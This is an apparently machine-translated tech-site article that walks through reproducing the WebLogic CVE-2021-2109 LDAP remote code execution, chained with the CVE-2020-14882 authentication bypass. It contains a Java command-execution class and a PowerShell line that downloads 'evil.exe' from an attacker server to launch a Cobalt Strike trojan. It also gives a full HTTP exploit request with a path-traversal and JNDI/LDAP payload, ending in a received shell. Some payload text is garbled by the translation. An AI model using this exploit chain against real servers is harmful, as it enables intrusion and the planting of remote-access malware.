Shulou(Shulou.com)05/31 Report--

What this article shares with you is about the recurrence of weblogic CVE-2021-2109ldap remote code execution vulnerabilities. The editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article. Without saying much, follow the editor to have a look.

Environment building

Reference:

Https://blog.csdn.net/zhlh_xt/article/details/76436807

Download link:

Https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

Https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html

Start the installation:

| | Java-D64-jar wls1036_generic.jar |

| | C:\ Oracle\ Middleware\ user_projects\ domains | |

Set password

Build up

Access target:

Loophole recurrence

Preparatory work:

Download https://github.com/RandomRobbieBF/marshalsec-jar/archive/master.zip for ldap package

Construct the java package for compilation: Request.java

| | import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Request {public Request () throws Exception {Process p = Runtime.getRuntime (). Exec (new String [] {"cmd", "/ c", "calc.exe"}); InputStream is = p.getInputStream (); BufferedReader reader = new BufferedReader (new InputStreamReader (is)); String line;while ((line = reader.readLine ())! = null) {System.out.println (line);} p.waitFor (); is.close () Reader.close (); p.destroy ();}} |

If you want to launch CS, modify calc.exe to download the cs Trojan and execute the command.

Cd. /.. / Windows/Temp & & powershell (new-object System.Net.WebClient) .DownloadFile ('http://vps/123.jpg','evil.exe') & evil.exe

Compile: note that the jdk is compiled with the jdk version of the target environment

Compile the class package and upload it to vps

Open the http service and put the compiled class package below

Start the ldap service with the downloaded marshalsec package:

Request through burp: cooperate

CVE-2021-2109 (ldap remote code execution) and CVE-2020-14882 (unauthorized access)

Full packet:

| | POST / console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1Host: 192.168.48.203:7001User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,en-US;q=0.7,en | Q=0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1X-Forwarded-For: 127.0.0.2Content-Length: 163Content-Type: application/x-www-form-urlencoded

_ pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle (% 22 position ldaprime hand hand vpsPlux 5005 Universe RequestistAdminServer% 22) |

Cs receives shell

Constraints: the target can go out of the network and can successfully construct and send packets

These are the reproductions of weblogic CVE-2021-2109ldap remote code execution vulnerabilities, and the editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.